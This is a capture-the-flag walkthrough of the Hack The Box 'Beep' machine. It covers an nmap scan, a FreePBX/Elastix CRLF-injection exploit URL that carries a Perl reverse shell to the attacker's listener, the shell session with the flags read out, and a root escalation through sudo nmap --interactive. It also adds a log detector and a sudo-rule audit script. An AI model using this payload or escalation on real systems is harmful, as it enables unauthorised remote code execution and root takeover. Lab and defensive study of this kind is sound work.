| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| Beep - HTB | Easy | Linux | |
Walkthrough
Let's start with an nmap scan.
```
┌──(root💀kali)-[~]
└─# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-20 04:57 EST
Stats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 04:59 (0:00:06 remaining)
Stats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.12% done; ETC: 05:02 (0:00:07 remaining)
Stats: 0:05:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.39% done; ETC: 05:02 (0:00:07 remaining)
Stats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 90.91% done; ETC: 05:03 (0:00:08 remaining)
Stats: 0:06:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.94% done; ETC: 05:03 (0:00:06 remaining)
Stats: 0:06:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.70% done; ETC: 05:03 (0:00:06 remaining)
Stats: 0:06:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)
Stats: 0:06:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)
Nmap scan report for 10.10.10.7 (10.10.10.7)
Host is up (0.093s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL RESP-CODES USER EXPIRE(NEVER) TOP LOGIN-DELAY(0) PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP AUTH-RESP-CODE STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2         111/tcp     rpcbind
|   100000  2         111/udp     rpcbind
|   100024  1         875/udp     status
|_  100024  1         878/tcp     status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CATENATE IDLE Completed ACL OK CHILDREN ID ATOMIC URLAUTHA0001 NO X-NETSCAPE THREAD=REFERENCES RIGHTS=kxte LIST-SUBSCRIBED LISTEXT CONDSTORE UNSELECT RENAME MAILBOX-REFERRALS ANNOTATEMORE IMAP4 MULTIAPPEND QUOTA NAMESPACE THREAD=ORDEREDSUBJECT BINARY SORT=MODSEQ SORT IMAP4rev1 STARTTLS LITERAL+ UIDPLUS
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2021-11-20T11:01:40+00:00; +59m59s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/20%OT=22%CT=1%CU=38827%PV=Y%DS=2%DC=T%G=Y%TM=6198C8
OS:3F%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=CC%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
OS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 59m58s
TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   68.64 ms 10.10.14.1 (10.10.14.1)
2   68.77 ms 10.10.10.7 (10.10.10.7)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 463.84 seconds
```
There really were a lot of open ports, and that bothered me. I started with port 80 and researched the version information I obtained. At https://10.10.10.7/admin/config.php I found the string "FreePBX 2.8.1.4 on 10.10.10.7" and started searching for it. There was an exploit at https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/master/exploit.py, but I couldn't get it to run. I hit an SSL error and didn't bother trying to fix it. I decided to convert it to Python 3 myself. Meanwhile I took the easy route and had it simply return the URL to me directly.
```
┌──(root💀kali)-[~/10.10.10.7/exp]
└─# cat test.py
```

```python
import requests

rhost = "10.10.10.7"   # target host
lhost = "10.10.14.6"   # listener address
lport = 4444           # listener port
extension = "233"      # FreePBX extension used in the callmenum parameter

# Build the callme_page.php request; the injected part is kept URL-encoded exactly as in the original exploit
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
print(url)
# requests.get(url, verify=False)   # left disabled: the printed URL is opened in the browser instead
```
Now let's run it.
```
┌──(root💀kali)-[~/10.10.10.7/exp]
└─# python3 test.py
https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.6%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
```
I took the address and opened it in the browser.
```
┌──(root💀kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from beep.localdomain [10.10.10.7] 60262
id
uid=100(asterisk) gid=101(asterisk)
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ pwd
pwd
/tmp
bash-3.2$ cd /home
cd /home
bash-3.2$ alias ls="ls -al"
alias ls="ls -al"
bash-3.2$ ls
ls
total 28
drwxr-xr-x  4 root       root       4096 Apr  7  2017 .
drwxr-xr-x 22 root       root       4096 Nov 20 12:55 ..
drwxrwxr-x  2 fanis      fanis      4096 Apr  7  2017 fanis
drwx------  2 spamfilter spamfilter 4096 Apr  7  2017 spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
total 32
drwxrwxr-x 2 fanis fanis 4096 Apr  7  2017 .
drwxr-xr-x 4 root  root  4096 Apr  7  2017 ..
-rw------- 1 fanis fanis  114 Apr  7  2017 .bash_history
-rw-r--r-- 1 fanis fanis   33 Apr  7  2017 .bash_logout
-rw-r--r-- 1 fanis fanis  176 Apr  7  2017 .bash_profile
-rw-r--r-- 1 fanis fanis  124 Apr  7  2017 .bashrc
-rw-rw-r-- 1 fanis fanis   33 Nov 20 12:55 user.txt
bash-3.2$ cat user.txt
cat user.txt
c923eee6a96abd8008a69532fcd6840d
```
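From the defender's side, the request that gave this shell leaves a distinctive trace: a `callme_page.php` hit whose `callmenum` parameter contains percent-encoded CR/LF pairs followed by `Application:`/`Data:` lines. The following detector is an added example and not part of the original writeup; it assumes the PBX's Apache vhost logs in the standard combined format with the request line still URL-encoded, and the three log lines it scans are constructed for the example (the real payload is replaced by a `CONSTRUCTED_PAYLOAD` placeholder).

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format. The regex is mine; adapt it to the LogFormat
# actually configured on the PBX host.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

CALLME_PATH = '/recordings/misc/callme_page.php'

# Constructed sample: one injected request (payload replaced by a placeholder),
# one ordinary click-to-call request, one unrelated page view.
SAMPLE_LOG = """\
10.10.14.6 - - [20/Nov/2021:12:55:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20CONSTRUCTED_PAYLOAD%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.6 - - [20/Nov/2021:12:54:30 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.6 - - [20/Nov/2021:12:54:00 +0000] "GET /admin/config.php HTTP/1.1" 200 8021 "-" "Mozilla/5.0"
"""


def analyse_target(target: str) -> Optional[Dict]:
    """Return a finding if the request target carries a CRLF injection in the
    callmenum parameter of callme_page.php, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith(CALLME_PATH):
        return None
    # parse_qs percent-decodes, so %0D%0A becomes a real CR LF here.
    params = parse_qs(parts.query, keep_blank_values=True)
    callmenum = params.get('callmenum', [''])[0]
    lines = re.split(r'\r\n|\r|\n', callmenum)
    if len(lines) == 1:
        return None  # a plain extension: no line break, nothing injected
    # Every line after the first was smuggled into the Asterisk action;
    # record the Application:/Data: pairs for the analyst.
    injected = {}
    for line in lines[1:]:
        m = re.match(r'\s*(Application|Data)\s*:\s*(.*)$', line, re.IGNORECASE)
        if m:
            injected[m.group(1).lower()] = m.group(2).strip()
    reasons = ['CRLF in callmenum']
    if injected.get('application', '').lower() == 'system':
        reasons.append('Asterisk System() application injected')
    return {'extension': lines[0], 'injected': injected, 'reasons': reasons}


def scan_log(lines: List[str]) -> List[Dict]:
    """Run analyse_target over access-log lines; return one finding per hit."""
    findings = []
    for raw in lines:
        m = LOG_RE.match(raw)
        if not m:
            continue
        finding = analyse_target(m.group('target'))
        if finding:
            finding.update(ip=m.group('ip'), ts=m.group('ts'), status=m.group('status'))
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} ext={f['extension']!r} "
              f"{', '.join(f['reasons'])} injected={f['injected']}")
```

Matching on a decoded line break rather than on the literal `%0D%0A` string catches the same request when it arrives double-encoded or with lowercase hex, and the `Application: system` check separates a curious probe from an actual command execution attempt. Note that this only works if the vhost logs the request line; on an Elastix box the HTTPS vhost on 443 may log to a different file than port 80.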
Becoming root was easy too.
```
bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$
bash-3.2$
bash-3.2$ sudo -u root /usr/bin/nmap --interactive
sudo -u root /usr/bin/nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# cd /root
cd /root
sh-3.2# ls
ls
anaconda-ks.cfg  elastix-pr-2.2-1.i386.rpm  install.log  install.log.syslog  postnochroot  root.txt  webmin-1.570-1.noarch.rpm
sh-3.2# cat root.txt
cat root.txt
97b794de414bb98f984d69a8998c4287
```
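The root step worked because the service account had a blanket `NOPASSWD` rule for a binary that can hand back a shell. A small audit that parses `sudo -l` output and flags such rules is a natural hardening check; the script below is an added example, not part of the writeup. The `sudo -l` text it parses is copied from the session above, the rule regex and the `SHELL_CAPABLE` map are my own, and that map is deliberately limited to the one binary the writeup demonstrates (nmap's interactive mode).

```python
import re
from typing import Dict, List

# Copied from the `sudo -l` session above; the Defaults block is kept so the
# parser has to skip it, as it would on a real host.
SUDO_L_OUTPUT = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# One rule line: "(runas) TAG: TAG: /path/to/cmd args" (regex is mine).
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')

# Binaries the writeup shows turning a root sudo rule into a root shell.
# This map is mine and deliberately minimal; grow it from your own review.
SHELL_CAPABLE = {
    'nmap': 'old releases ship --interactive, whose !sh spawns a shell as the sudo target',
}


def parse_sudo_l(text: str) -> List[Dict]:
    """Parse `sudo -l` output into rule dicts; ignores the Defaults block."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith('User ') and 'may run the following commands' in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(':') for t in m.group('tags').split()]
        rules.append({
            'runas': m.group('runas').strip(),
            'nopasswd': 'NOPASSWD' in tags,
            'command': m.group('cmd').strip(),
        })
    return rules


def audit(rules: List[Dict], shell_capable: Dict[str, str] = SHELL_CAPABLE) -> List[Dict]:
    """Flag passwordless root rules whose binary can hand back a shell."""
    findings = []
    for r in rules:
        # runas may be "root" or "ALL : ALL"; only the user part matters here
        runas_user = r['runas'].split(':')[0].strip()
        binary = r['command'].split()[0].rsplit('/', 1)[-1]
        if r['nopasswd'] and runas_user in ('root', 'ALL') and binary in shell_capable:
            findings.append({'command': r['command'], 'why': shell_capable[binary]})
    return findings


if __name__ == '__main__':
    parsed = parse_sudo_l(SUDO_L_OUTPUT)
    print(f'{len(parsed)} sudo rules, {sum(r["nopasswd"] for r in parsed)} without password')
    for f in audit(parsed):
        print(f"RISK {f['command']}: {f['why']}")
```

Every one of the 14 rules here is `(root) NOPASSWD`, so the flag on `/usr/bin/nmap` is the one the writeup exploits, but the real fix is broader: a rule for a service account should name the exact arguments it needs (or wrap them in a script the account cannot edit) rather than grant the whole binary. Later Nmap releases removed interactive mode, so an up-to-date package closes this particular escape even where the rule stays.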